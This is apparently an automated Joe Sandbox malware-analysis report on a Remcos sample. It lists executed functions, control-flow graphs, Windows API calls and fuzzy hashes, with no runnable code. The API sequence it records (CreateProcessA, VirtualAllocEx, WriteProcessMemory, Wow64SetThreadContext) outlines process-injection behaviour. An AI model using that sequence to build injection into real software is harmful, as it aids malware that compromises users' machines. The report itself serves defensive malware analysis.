35083->35085 35085->35022 35087 74e76e5 Wow64SetThreadContext 35086->35087 35089 74e772d 35087->35089 35089->35032 35091 74e76e5 Wow64SetThreadContext 35090->35091 35093 74e772d 35091->35093 35093->35032 35095 74e7b49 CreateProcessA 35094->35095 35097 74e7d0b 35095->35097 35099 74e7b49 CreateProcessA 35098->35099 35101 74e7d0b 35099->35101 35103 74e7880 WriteProcessMemory 35102->35103 35105 74e78d7 35103->35105 35105->35045 35107 74e7880 WriteProcessMemory 35106->35107 35109 74e78d7 35107->35109 35109->35045 35111 74e7973 ReadProcessMemory 35110->35111 35113 74e79b7 35111->35113 35113->35051 35115 74e7973 ReadProcessMemory 35114->35115 35117 74e79b7 35115->35117 35117->35051 35119 74e77b8 VirtualAllocEx 35118->35119 35121 74e77f5 35119->35121 35121->35066 35123 74e77b8 VirtualAllocEx 35122->35123 35125 74e77f5 35123->35125 35125->35066

                                              Executed Functions

                                              Function 0132CF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 387 132cf90-132d02f GetCurrentProcess 391 132d031-132d037 387->391 392 132d038-132d06c GetCurrentThread 387->392 391->392 393 132d075-132d0a9 GetCurrentProcess 392->393 394 132d06e-132d074 392->394 395 132d0b2-132d0cd call 132d578 393->395 396 132d0ab-132d0b1 393->396 394->393 400 132d0d3-132d102 GetCurrentThreadId 395->400 396->395 401 132d104-132d10a 400->401 402 132d10b-132d16d 400->402 401->402
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0132D01E
                                              • GetCurrentThread.KERNEL32 ref: 0132D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0132D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0132D0F1
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7716d5d895ccb3e4860c854a0270b928390699bc4c3c80b477161156473edb49
                                              • Instruction ID: 681704935e2c286452df2c784d924631761dcece839192cd455ceceb37cb6ced
                                              • Opcode Fuzzy Hash: 7716d5d895ccb3e4860c854a0270b928390699bc4c3c80b477161156473edb49
                                              • Instruction Fuzzy Hash: B15178B09013498FDB24DFA9D548BDEBBF1BF88304F208459D419AB3A0D7745844CB66
                                              Function 0132CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 409 132cfa0-132d02f GetCurrentProcess 413 132d031-132d037 409->413 414 132d038-132d06c GetCurrentThread 409->414 413->414 415 132d075-132d0a9 GetCurrentProcess 414->415 416 132d06e-132d074 414->416 417 132d0b2-132d0cd call 132d578 415->417 418 132d0ab-132d0b1 415->418 416->415 422 132d0d3-132d102 GetCurrentThreadId 417->422 418->417 423 132d104-132d10a 422->423 424 132d10b-132d16d 422->424 423->424
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0132D01E
                                              • GetCurrentThread.KERNEL32 ref: 0132D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0132D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0132D0F1
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: da321023bbb398256fb9b70ba7529bbe369a6e0830b25c061a970c9a6e80b20d
                                              • Instruction ID: 8fa2fdd588f633f4ff54aa0bf20c7daf4d51e6a198b8b61ac00050c8fa050332
                                              • Opcode Fuzzy Hash: da321023bbb398256fb9b70ba7529bbe369a6e0830b25c061a970c9a6e80b20d
                                              • Instruction Fuzzy Hash: 6A5188B09013499FDB24DFAAD548BDEBBF1FF88304F208459D019AB3A0D7745844CB66
                                              Function 03001790 Relevance: 1.8, APIs: 1, Instructions: 265COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 431 3001790-3001791 432 3001793-30017e5 431->432 433 30017ef-3001819 431->433 432->433 434 3001877-3001879 433->434 435 300181b-3001851 433->435 438 30018d7-30018ee 434->438 439 300187b-300187f 434->439 436 3001853-3001871 435->436 437 30018af-30018cd 435->437 440 30018cf-30018d6 436->440 442 3001873-3001875 436->442 437->440 441 30018ef-30018f6 438->441 443 3001883-3001891 439->443 444 30018f7-30018f8 441->444 442->434 443->441 445 3001893-3001899 443->445 444->443 447 30018f9-3001956 444->447 445->444 448 300189b-30018ac 445->448 449 3001961-3001968 447->449 450 3001958-300195e 447->450 448->437 451 3001973-3001a12 CreateWindowExW 449->451 452 300196a-3001970 449->452 450->449 454 3001a14-3001a1a 451->454 455 3001a1b-3001a53 451->455 452->451 454->455 459 3001a60 455->459 460 3001a55-3001a58 455->460 461 3001a61 459->461 460->459 461->461
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03001A02
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 0afa88eb73fef4e64e16183c3bedfbcfd661f4122d19930bede05b2e32414228
                                              • Instruction ID: 8239723ef5a514dfbadfb45a4b45bc23d97a62e712769520d99998ccc3388b6e
                                              • Opcode Fuzzy Hash: 0afa88eb73fef4e64e16183c3bedfbcfd661f4122d19930bede05b2e32414228
                                              • Instruction Fuzzy Hash: BBA19C75C193889FDB06CFA5D8845DDBFB1EF0A320F1880ABE844AB262D3395945CF51
                                              Function 074E7AB4 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 462 74e7ab4-74e7b55 464 74e7b8e-74e7bae 462->464 465 74e7b57-74e7b61 462->465 472 74e7be7-74e7c16 464->472 473 74e7bb0-74e7bba 464->473 465->464 466 74e7b63-74e7b65 465->466 467 74e7b88-74e7b8b 466->467 468 74e7b67-74e7b71 466->468 467->464 470 74e7b75-74e7b84 468->470 471 74e7b73 468->471 470->470 475 74e7b86 470->475 471->470 481 74e7c4f-74e7d09 CreateProcessA 472->481 482 74e7c18-74e7c22 472->482 473->472 474 74e7bbc-74e7bbe 473->474 476 74e7bc0-74e7bca 474->476 477 74e7be1-74e7be4 474->477 475->467 479 74e7bce-74e7bdd 476->479 480 74e7bcc 476->480 477->472 479->479 483 74e7bdf 479->483 480->479 493 74e7d0b-74e7d11 481->493 494 74e7d12-74e7d98 481->494 482->481 484 74e7c24-74e7c26 482->484 483->477 486 74e7c28-74e7c32 484->486 487 74e7c49-74e7c4c 484->487 488 74e7c36-74e7c45 486->488 489 74e7c34 486->489 487->481 488->488 491 74e7c47 488->491 489->488 491->487 493->494 504 74e7d9a-74e7d9e 494->504 505 74e7da8-74e7dac 494->505 504->505 506 74e7da0 504->506 507 74e7dae-74e7db2 505->507 508 74e7dbc-74e7dc0 505->508 506->505 507->508 509 74e7db4 507->509 510 74e7dc2-74e7dc6 508->510 511 74e7dd0-74e7dd4 508->511 509->508 510->511 514 74e7dc8 510->514 512 74e7de6-74e7ded 511->512 513 74e7dd6-74e7ddc 511->513 515 74e7def-74e7dfe 512->515 516 74e7e04 512->516 513->512 514->511 515->516 518 74e7e05 516->518 518->518
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074E7CF6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 636ffc1bf5dc61a6a054f64c862cb393081d2131542731e2e4e7dae406e46047
                                              • Instruction ID: 8826c4991169766400d05824727218dc664e59f750f0ce8a842560ad229c62fc
                                              • Opcode Fuzzy Hash: 636ffc1bf5dc61a6a054f64c862cb393081d2131542731e2e4e7dae406e46047
                                              • Instruction Fuzzy Hash: 12A15EB1D0031ACFEB11CF68C840BEEBBB6BF44325F1485AAD859A7240D7759985CF91
                                              Function 074E7AC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 519 74e7ac0-74e7b55 521 74e7b8e-74e7bae 519->521 522 74e7b57-74e7b61 519->522 529 74e7be7-74e7c16 521->529 530 74e7bb0-74e7bba 521->530 522->521 523 74e7b63-74e7b65 522->523 524 74e7b88-74e7b8b 523->524 525 74e7b67-74e7b71 523->525 524->521 527 74e7b75-74e7b84 525->527 528 74e7b73 525->528 527->527 532 74e7b86 527->532 528->527 538 74e7c4f-74e7d09 CreateProcessA 529->538 539 74e7c18-74e7c22 529->539 530->529 531 74e7bbc-74e7bbe 530->531 533 74e7bc0-74e7bca 531->533 534 74e7be1-74e7be4 531->534 532->524 536 74e7bce-74e7bdd 533->536 537 74e7bcc 533->537 534->529 536->536 540 74e7bdf 536->540 537->536 550 74e7d0b-74e7d11 538->550 551 74e7d12-74e7d98 538->551 539->538 541 74e7c24-74e7c26 539->541 540->534 543 74e7c28-74e7c32 541->543 544 74e7c49-74e7c4c 541->544 545 74e7c36-74e7c45 543->545 546 74e7c34 543->546 544->538 545->545 548 74e7c47 545->548 546->545 548->544 550->551 561 74e7d9a-74e7d9e 551->561 562 74e7da8-74e7dac 551->562 561->562 563 74e7da0 561->563 564 74e7dae-74e7db2 562->564 565 74e7dbc-74e7dc0 562->565 563->562 564->565 566 74e7db4 564->566 567 74e7dc2-74e7dc6 565->567 568 74e7dd0-74e7dd4 565->568 566->565 567->568 571 74e7dc8 567->571 569 74e7de6-74e7ded 568->569 570 74e7dd6-74e7ddc 568->570 572 74e7def-74e7dfe 569->572 573 74e7e04 569->573 570->569 571->568 572->573 575 74e7e05 573->575 575->575
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074E7CF6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: ee05529eb489797823608faca1f80afeeaf95f5aa92553edd71f6e423a9e7e5a
                                              • Instruction ID: 2e12b9facd14268acf1b094abdf2b8345ad3275be596f338ddc7a2accadf9136
                                              • Opcode Fuzzy Hash: ee05529eb489797823608faca1f80afeeaf95f5aa92553edd71f6e423a9e7e5a
                                              • Instruction Fuzzy Hash: 00916EB1D0031ACFEB21CF68C840BEEBBB6BF44325F1485AAD858A7240D7749985CF91
                                              Function 0132AD08 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 576 132ad08-132ad17 577 132ad43-132ad47 576->577 578 132ad19-132ad26 call 132a02c 576->578 579 132ad5b-132ad9c 577->579 580 132ad49-132ad53 577->580 585 132ad28 578->585 586 132ad3c 578->586 587 132ada9-132adb7 579->587 588 132ad9e-132ada6 579->588 580->579 633 132ad2e call 132afa0 585->633 634 132ad2e call 132af90 585->634 586->577 589 132addb-132addd 587->589 590 132adb9-132adbe 587->590 588->587 592 132ade0-132ade7 589->592 593 132adc0-132adc7 call 132a038 590->593 594 132adc9 590->594 591 132ad34-132ad36 591->586 595 132ae78-132af38 591->595 596 132adf4-132adfb 592->596 597 132ade9-132adf1 592->597 599 132adcb-132add9 593->599 594->599 626 132af40-132af6b GetModuleHandleW 595->626 627 132af3a-132af3d 595->627 600 132ae08-132ae11 call 132a048 596->600 601 132adfd-132ae05 596->601 597->596 599->592 607 132ae13-132ae1b 600->607 608 132ae1e-132ae23 600->608 601->600 607->608 609 132ae41-132ae45 608->609 610 132ae25-132ae2c 608->610 631 132ae48 call 132b2a0 609->631 632 132ae48 call 132b290 609->632 610->609 612 132ae2e-132ae3e call 132a058 call 132a068 610->612 612->609 613 132ae4b-132ae4e 616 132ae50-132ae6e 613->616 617 132ae71-132ae77 613->617 616->617 628 132af74-132af88 626->628 629 132af6d-132af73 626->629 627->626 629->628 631->613 632->613 633->591 634->591
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0132AF5E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: b535fbe6a8a30ecfad03a5231e8463b97dcc449edb3b6acd625c3819313f05d2
                                              • Instruction ID: 4f4859d3cea41dc4f29974300aae7e8f28e75783c0b53c28f75f0f909210075c
                                              • Opcode Fuzzy Hash: b535fbe6a8a30ecfad03a5231e8463b97dcc449edb3b6acd625c3819313f05d2
                                              • Instruction Fuzzy Hash: AE814770A00B158FE764EF29D45079ABBF1FF88208F00892DD49ADBB50D779E849CB91
                                              Function 030018F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 815 30018f0-3001956 816 3001961-3001968 815->816 817 3001958-300195e 815->817 818 3001973-30019ab 816->818 819 300196a-3001970 816->819 817->816 820 30019b3-3001a12 CreateWindowExW 818->820 819->818 821 3001a14-3001a1a 820->821 822 3001a1b-3001a53 820->822 821->822 826 3001a60 822->826 827 3001a55-3001a58 822->827 828 3001a61 826->828 827->826 828->828
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03001A02
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e859b606466f1181414cc0cfbf6fb6c8ece125c079adaacec4de828247800994
                                              • Instruction ID: 3eb77c319e26966727cf5e81f68e253a97878da04a2db1ddbb65ddfcf4c3c6ea
                                              • Opcode Fuzzy Hash: e859b606466f1181414cc0cfbf6fb6c8ece125c079adaacec4de828247800994
                                              • Instruction Fuzzy Hash: 3441C0B5D003099FEB14CF99D884ADEFBF6BF48310F24812AE819AB250D7719945CF90
                                              Function 013258EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 829 13258ec-13259b9 CreateActCtxA 831 13259c2-1325a1c 829->831 832 13259bb-13259c1 829->832 839 1325a2b-1325a2f 831->839 840 1325a1e-1325a21 831->840 832->831 841 1325a40 839->841 842 1325a31-1325a3d 839->842 840->839 844 1325a41 841->844 842->841 844->844
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013259A9
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4715cfb050dc66182eec5fbbb0ed0a588952d0ea16fa4a7b6b857968be64e093
                                              • Instruction ID: 8ecc67deaba5127e7c86c38cb94c13d4f0aa7e78bc6d450e34cd5bd6cfdc5f20
                                              • Opcode Fuzzy Hash: 4715cfb050dc66182eec5fbbb0ed0a588952d0ea16fa4a7b6b857968be64e093
                                              • Instruction Fuzzy Hash: AD41C171C10719CFEB25DFA9C8847DEBBB1BF49704F20806AD408AB251DB756946CF50
                                              Function 013244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 845 13244b4-13259b9 CreateActCtxA 848 13259c2-1325a1c 845->848 849 13259bb-13259c1 845->849 856 1325a2b-1325a2f 848->856 857 1325a1e-1325a21 848->857 849->848 858 1325a40 856->858 859 1325a31-1325a3d 856->859 857->856 861 1325a41 858->861 859->858 861->861
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013259A9
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 06283fa72be65c6d54e406e45df5982ff963f6ad387ec809618b41d183ce79eb
                                              • Instruction ID: 73da6f666f367cdb0f929d9a7d4c1feac0e97a09b4de1bfba08aafe4495c4733
                                              • Opcode Fuzzy Hash: 06283fa72be65c6d54e406e45df5982ff963f6ad387ec809618b41d183ce79eb
                                              • Instruction Fuzzy Hash: AE41B070D0072DCBEB25DFAAC844BDEBBB5BF49704F20806AD408AB251DB756946CF91
                                              Function 03004040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 862 3004040-300407c 863 3004082-3004087 862->863 864 300412c-300414c 862->864 865 3004089-30040c0 863->865 866 30040da-3004112 CallWindowProcW 863->866 871 300414f-300415c 864->871 872 30040c2-30040c8 865->872 873 30040c9-30040d8 865->873 867 3004114-300411a 866->867 868 300411b-300412a 866->868 867->868 868->871 872->873 873->871
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 03004101
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 52447a9270b513169f9f0d9c441eb9f0148c844cfc5f849bdfa06112926ec28b
                                              • Instruction ID: 10d7111fdde97c730507131da9236718798ae294e9d6c3e09e4c00af8d5153bd
                                              • Opcode Fuzzy Hash: 52447a9270b513169f9f0d9c441eb9f0148c844cfc5f849bdfa06112926ec28b
                                              • Instruction Fuzzy Hash: B04129B4900309CFDB14CF9AC848AAAFBF5FB88314F24C459D519AB361D775A845CFA0
                                              Function 074E7838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 886 74e7838-74e7886 888 74e7888-74e7894 886->888 889 74e7896-74e78d5 WriteProcessMemory 886->889 888->889 891 74e78de-74e790e 889->891 892 74e78d7-74e78dd 889->892 892->891
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074E78C8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 1df1f77daf94ca715a92261ebcad2d776ccde1edbd407dfb2ba4ab2f82fad0b3
                                              • Instruction ID: 87d2b25e651fd29cca1e258dc29e0b3415941037aab34747c122a1890a264099
                                              • Opcode Fuzzy Hash: 1df1f77daf94ca715a92261ebcad2d776ccde1edbd407dfb2ba4ab2f82fad0b3
                                              • Instruction Fuzzy Hash: F6212AB19003199FDB10CFA9C885BDEBBF5FF48320F14842AE519A7240D7799544CBA1
                                              Function 074E7830 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 876 74e7830-74e7886 878 74e7888-74e7894 876->878 879 74e7896-74e78d5 WriteProcessMemory 876->879 878->879 881 74e78de-74e790e 879->881 882 74e78d7-74e78dd 879->882 882->881
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074E78C8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 939c4aa8d5e0983877450b6ce27da0a3e4b1f48a795a9873c0c32549d99f8f16
                                              • Instruction ID: 018561298c48919679e0c95a26c4d59a84797d495946cd5779c40958f40c1b4d
                                              • Opcode Fuzzy Hash: 939c4aa8d5e0983877450b6ce27da0a3e4b1f48a795a9873c0c32549d99f8f16
                                              • Instruction Fuzzy Hash: 832148B6900309DFDB00CFA9C9857EEBBF5FF48320F14882AE558A7240D7789554CBA0
                                              Function 0132D5E8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132D677
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ac6c8703c004a632512c5515ca4993b6a17e4c4451f6bde8b4c709c4e36ebeb2
                                              • Instruction ID: 256264f0db6a2a163b87c43fda732ab1a24415f3dccb820dd7d6fcbd469cae8d
                                              • Opcode Fuzzy Hash: ac6c8703c004a632512c5515ca4993b6a17e4c4451f6bde8b4c709c4e36ebeb2
                                              • Instruction Fuzzy Hash: B02105B5900208DFDB10CF9AE884AEEBBF4FB48320F14801AE918A3310D3749945CF61
                                              Function 074E7698 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074E771E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 21dbfcffbb4186b0a6758451220f52a311b178181a405778da407cf0d3dbceaf
                                              • Instruction ID: 3090e4dbc7779e1d1cdbced8faca347969c3ed0c33c5b2946e7cc1123e8b7a8a
                                              • Opcode Fuzzy Hash: 21dbfcffbb4186b0a6758451220f52a311b178181a405778da407cf0d3dbceaf
                                              • Instruction Fuzzy Hash: 3C2138B6D003098FDB14DFA9C5857EEBBF4EF48224F14842AD559A7240DB789A45CFA0
                                              Function 074E76A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074E771E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: f2e5cb912b6f718221e9a713fb3ea000d270337eab30469766aed9ea437e1970
                                              • Instruction ID: ea92b719d3eaed592d3c2a8af235b38c774d628f12faa2b435c4d587ea68b1f2
                                              • Opcode Fuzzy Hash: f2e5cb912b6f718221e9a713fb3ea000d270337eab30469766aed9ea437e1970
                                              • Instruction Fuzzy Hash: 712149B19003098FDB10DFAAC4857EEBBF4EF48224F14842AD559A7340D778A945CFA0
                                              Function 074E7928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074E79A8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 31a4f50e8878aa55a232652f021371a01fd4c263641c214f9bba342a371da659
                                              • Instruction ID: af29fbad51b5614e097b51cd717df4c5eb50c8a740563f62225bc4e8018a286e
                                              • Opcode Fuzzy Hash: 31a4f50e8878aa55a232652f021371a01fd4c263641c214f9bba342a371da659
                                              • Instruction Fuzzy Hash: A82139B18003599FDB10DFAAD884BEEFBF5FF48320F54842AE559A7240D7799540CBA1
                                              Function 0132D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132D677
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f67e723432cd637140729847a01daff8d689da729b74680b6de910c8ae4436be
                                              • Instruction ID: f0c39ab82cb4e156bda90b7ca8c48a65238ea89db9a32dd9704db3fd3e98a3db
                                              • Opcode Fuzzy Hash: f67e723432cd637140729847a01daff8d689da729b74680b6de910c8ae4436be
                                              • Instruction Fuzzy Hash: 0A21F5B5900219DFDB10CF9AD484ADEFBF4FB48320F14801AE918A3350D374A944CF64
                                              Function 074E7921 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074E79A8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: da59c803c1d97505c649230eba06e586e9c4a05e8002ebe4a9e1d7dc7e9999ef
                                              • Instruction ID: 757f614ba74c93def320924a4949b6b6f3e67d0646a543e5f414278e9e12c804
                                              • Opcode Fuzzy Hash: da59c803c1d97505c649230eba06e586e9c4a05e8002ebe4a9e1d7dc7e9999ef
                                              • Instruction Fuzzy Hash: 0B2136B28003099FDB10CFA9C8857EEBBF5FF48320F14842AE558A7244D7799604CBA0
                                              Function 074E7778 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074E77E6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 077d9c3a4dc0eb90d9736234ac08ccee38d1145bf0bd3dd0bf3ef136aebaa82c
                                              • Instruction ID: 1b069a1ab81c198e8fdbc9201ddbb5d00893d6833763fc1a9b57d78af8a00d94
                                              • Opcode Fuzzy Hash: 077d9c3a4dc0eb90d9736234ac08ccee38d1145bf0bd3dd0bf3ef136aebaa82c
                                              • Instruction Fuzzy Hash: D01137768003499FDB10DFAAD844BDFBBF5EF48320F14842AE519A7250C775A540CFA0
